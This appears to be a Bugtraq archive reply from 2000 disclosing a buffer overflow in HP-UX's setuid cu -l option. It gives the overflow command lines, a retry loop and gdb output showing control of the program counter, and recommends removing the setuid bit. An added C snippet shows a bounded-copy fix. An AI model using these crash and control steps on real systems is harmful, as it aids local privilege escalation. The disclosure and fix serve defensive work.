Bugtraq mailing list archives
Re: HPUX cu -l option buffer overflow vulnerabilit
From: "J.A. Gutierrez" <spd () GTC1 CPS UNIZAR ES>
Date: Wed, 8 Nov 2000 11:13:42 +0200
=======================================================
HPUX cu -l option buffer overflow vulnerability
=======================================================

Date: 02/11/2000
Tested on HP-UX B.11.00

$ cu -l `perl -e 'printf "A" x 9777'`

It's exploitable on 10.20 (trivial exploit: you don't even have to find the return address, the buffer itself gets executed).

HP-UX 9.x 68k seems to be vulnerable too, but I don't have the exploit.

On HP-UX 11 you need PA-RISC 1.1 shell code, and the PC you get with

./cu -l `perl -e 'printf "A" x 5667'`

changes randomly (why?). Eventually you get a pointer to your data:

$ while :
do
  ./cu -l `perl -e 'printf "A" x 5667'`
  if file core | egrep -v SIGILL
  then break
  fi
done
[...]
Illegal instruction(coredump)
Connect failed: Requested device/system name not known
Illegal instruction(coredump)
Memory fault(coredump)
core: core file from 'cu' - received SIGSEGV
$ gdb cu core
[...]
Core was generated by `cu'.
Program terminated with signal 11, Segmentation fault.
Unable to find __dld_flags symbol in object file.
#0  0x7f7eb010 in ?? ()
#0  0x7f7eb010 in ?? ()
(gdb) print {char *} 0x7f7eb010
$1 = 0x41414141 <Address 0x41414141 out of bounds>
(gdb)

Fix: chmod -s /bin/cu

--
finger spd () gtc1 cps unizar es for PGP        / So be easy and free
.mailcap tip of the day:                        / when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null       / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null              / (the pogues)
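The root cause the post points at is an unbounded copy of the -l argument into a fixed buffer. The following is an added illustration of the bounded alternative; it is not cu's code or HP's patch, and the 64-byte limit, the function names and the status codes are assumptions (cu's real buffer size is not on the page).

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed-size buffer for the line/device name. HP-UX cu's real
 * size is not known from the advisory; 64 is a constructed value. */
#define LINE_NAME_MAX 64

enum line_status { LINE_OK = 0, LINE_EMPTY = 1, LINE_TOO_LONG = 2 };

/* Copy the -l argument into a fixed buffer only if it fits, NUL included.
 * The crash in the post comes from copying an argv string of attacker
 * chosen length into a stack buffer without such a check. Scanning at
 * most `cap` bytes means an overlong argument is rejected before a single
 * byte is written, instead of running off the end of line_name. */
enum line_status set_line_device(const char *arg, char *line_name, size_t cap)
{
    size_t len = 0;

    if (arg == NULL || arg[0] == '\0')
        return LINE_EMPTY;
    /* Stop at cap: we never need the true length of a rejected argument,
     * only the fact that it does not fit. */
    while (len < cap && arg[len] != '\0')
        len++;
    if (len >= cap)
        return LINE_TOO_LONG;
    memcpy(line_name, arg, len + 1);
    return LINE_OK;
}

/* Helper: build an argument of n 'A' bytes (the same shape as the post's
 * perl -e 'printf "A" x n') and run it through set_line_device.
 * Returns the line_status, or -1 if the constructed argument could not
 * be allocated. */
int try_line_arg_of_length(size_t n)
{
    char line_name[LINE_NAME_MAX];
    char *arg = malloc(n + 1);
    int rc;

    if (arg == NULL)
        return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    rc = set_line_device(arg, line_name, sizeof line_name);
    free(arg);
    return rc;
}
```

With this check in place the 9777- and 5667-byte arguments from the post are refused with an error instead of overwriting the stack; removing the setuid bit (chmod -s), as the post recommends, remains the operational mitigation while the binary is unpatched.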
Current thread:
- HPUX cu -l option buffer overflow vulnerabilit zorgon (Nov 03)
- Re: HPUX cu -l option buffer overflow vulnerabilit J.A. Gutierrez (Nov 09)